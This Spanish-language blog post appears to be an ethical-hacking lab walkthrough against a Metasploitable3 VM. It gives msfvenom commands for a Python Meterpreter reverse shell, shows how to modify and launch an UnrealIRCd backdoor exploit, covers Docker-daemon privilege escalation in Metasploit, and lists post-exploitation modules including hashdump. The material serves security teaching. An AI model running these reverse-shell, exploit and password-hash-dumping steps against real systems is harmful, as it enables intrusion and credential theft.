top of page
Buscar

💻"Cómo Conseguir Escalar Privilegios: Guía Paso a Paso" 🔐

Actualizado: 15 feb



Ayer hablábamos un poco sobre la shell reversa y hoy os voy a mostrar una práctica sencilla sobre la La post-explotación, que como podéis intuir, es una fase esencial del hacking ético. En este post, detallo los pasos clave para realizar un ataque de escalada de privilegios.



1️⃣ Preparación del entorno


Inicia Kali Linux y la máquina vulnerable (Metasploitable3 Ubuntu) en la misma red.


Configura un payload con msfvenom:


msfvenom -p python/meterpreter/reverse_tcp LHOST=10.50.100.4 LPORT=4444 > payload.py



2️⃣ Uso del exploit UnrealIRCd


Descarga el exploit de la siguiente ruta:




3️⃣ Modificación del exploit


Abre el archivo exploit.py con un editor:


emacs exploit.py


Inserta el payload generado previamente, asegurándote de mantener la sintaxis de Python (escapando caracteres).



4️⃣ Ejecuta el exploit


Configura el manejador en Metasploit:


use exploit/multi/handler


set payload python/meterpreter/reverse_tcp


set LHOST 10.50.100.4


exploit


Lanza el exploit desde otra terminal:


./exploit.py 10.50.100.8 6667 -payload python


Resultado: Acceso a una shell Meterpreter en la máquina objetivo.



5️⃣ Aumentar privilegios


Envía la sesión a segundo plano:


background


sessions -l


Busca exploits disponibles:



search Docker_daemon


Configura el exploit y payload para escalada:



set payload linux/x86/meterpreter/reverse_tcp


exploit


Comprueba los nuevos privilegios obtenidos.



🔎 Ejecutando módulos de Metasploit


Con la sesión activa, utiliza módulos para extraer información relevante. Algunos ejemplos:


hashdump: Recupera hashes de contraseñas.


enum_network: Detalla configuraciones de red.


enum_logged_in_users: Muestra usuarios conectados.



🛡️ Reflexión final


Este ejercicio demuestra cómo pequeñas vulnerabilidades pueden permitir accesos críticos. La importancia de mantener sistemas actualizados y bien configurados es clave para prevenir ataques.


Curiosidad: UnrealIRCd es un caso clásico de backdoor introducido en código fuente público, demostrando que incluso software confiable puede ser comprometido.



💬 ¿Qué opinas de estas técnicas? ¿Ya las conocías? Comparte tus experiencias. 🚀



 
 
 

Comments


bottom of page